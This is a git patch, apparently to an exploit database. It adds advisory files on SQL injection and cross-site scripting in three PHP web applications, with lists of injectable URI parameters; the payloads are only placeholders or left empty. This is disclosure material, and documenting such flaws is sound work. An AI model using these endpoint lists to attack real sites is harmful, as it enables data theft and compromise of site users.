From 35d1967763d07fbb41d676f7f4d0c5459f7e0b22 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 8 Dec 2014 04:51:05 +0000
Subject: [PATCH] Updated 12_08_2014
---
 files.csv | 3 +++
 platforms/php/webapps/35480.txt | 22 ++++++++++++++++++++++
 platforms/php/webapps/35481.txt | 9 +++++++++
 platforms/php/webapps/35482.txt | 9 +++++++++
 4 files changed, 43 insertions(+)
 create mode 100755 platforms/php/webapps/35480.txt
 create mode 100755 platforms/php/webapps/35481.txt
 create mode 100755 platforms/php/webapps/35482.txt
diff --git a/files.csv b/files.csv
index 1014d9ffd..506b2699a 100755
--- a/files.csv
+++ b/files.csv
@@ -31954,3 +31954,6 @@ id,file,description,date,author,platform,type,port
 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0
 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0
 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0
+35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-21,"kurdish hackers team",php,webapps,0
+35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 'post.php' Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
+35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 'year' Parameter Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
diff --git a/platforms/php/webapps/35480.txt b/platforms/php/webapps/35480.txt
new file mode 100755
index 000000000..5daef4b4b
--- /dev/null
+++ b/platforms/php/webapps/35480.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/46960/info
+
+Online store php script is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SQL Injection URIs:
+====================
+
+http://www.example.com/detail.php?prodid=[SQL]
+http://www.example.com/view_wishlist.php?products_id=[SQL]
+http://www.example.com/moreImage.php?prod_id=[SQL]
+http://www.example.com/product2.php?loginn=confirmed&a=&b=&submit=+++Login+++.... [empty Query ]
+http://www.example.com/products.php?cid=21&sid=558&skip=[SQL]
+http://www.example.com/gstatus.php?code=[SQL]
+
+Cross Site Scripting URIs:
+==========================
+
+http://www.example.com/detail.php?prodid=
+http://www.example.com/products.php?cid=21&sid=558&skip=
+
diff --git a/platforms/php/webapps/35481.txt b/platforms/php/webapps/35481.txt
new file mode 100755
index 000000000..bbc899f67
--- /dev/null
+++ b/platforms/php/webapps/35481.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46961/info
+
+NewsPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+NewsPortal 0.37 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post.php?newsgroups=
\ No newline at end of file
diff --git a/platforms/php/webapps/35482.txt b/platforms/php/webapps/35482.txt
new file mode 100755
index 000000000..28c598d42
--- /dev/null
+++ b/platforms/php/webapps/35482.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46962/info
+
+PluggedOut Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PluggedOut Blog 1.9.9 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?year=
\ No newline at end of file